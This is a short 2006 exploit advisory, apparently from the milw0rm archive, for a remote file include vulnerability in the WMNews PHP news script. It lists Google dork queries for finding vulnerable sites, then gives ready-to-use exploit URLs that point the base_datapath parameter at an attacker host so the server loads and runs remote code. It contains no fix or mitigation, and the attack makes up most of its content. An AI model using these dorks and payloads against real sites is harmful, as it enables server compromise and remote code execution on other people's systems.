30 lines
No EOL
566 B
Text
30 lines
No EOL
566 B
Text
Advisory: WMNews Remote File Include Vulnerability
|
|
Release Date: 2006/07/26
|
|
Author: uNfz
|
|
Critical Level: High
|
|
Contact: unfzbr@hotmail.com
|
|
Vendor: Warta Mikael
|
|
|
|
--------------------
|
|
--------------------
|
|
|
|
Searching / Dork:
|
|
|
|
allinurl: *.php?Artid=*
|
|
allinurl: *.php?ArtCat=*
|
|
allinurl: wmprint.php
|
|
allinurl: wmview.php
|
|
|
|
--------------------
|
|
|
|
exploration:
|
|
|
|
/index.php?config=1&base_datapath=http://[evilhost]
|
|
/[dir]/index.php?config=1&base_datapath=http://[evilhost]
|
|
|
|
--------------------
|
|
|
|
uNfz
|
|
irc.efnet.org
|
|
|
|
# milw0rm.com [2006-07-27] |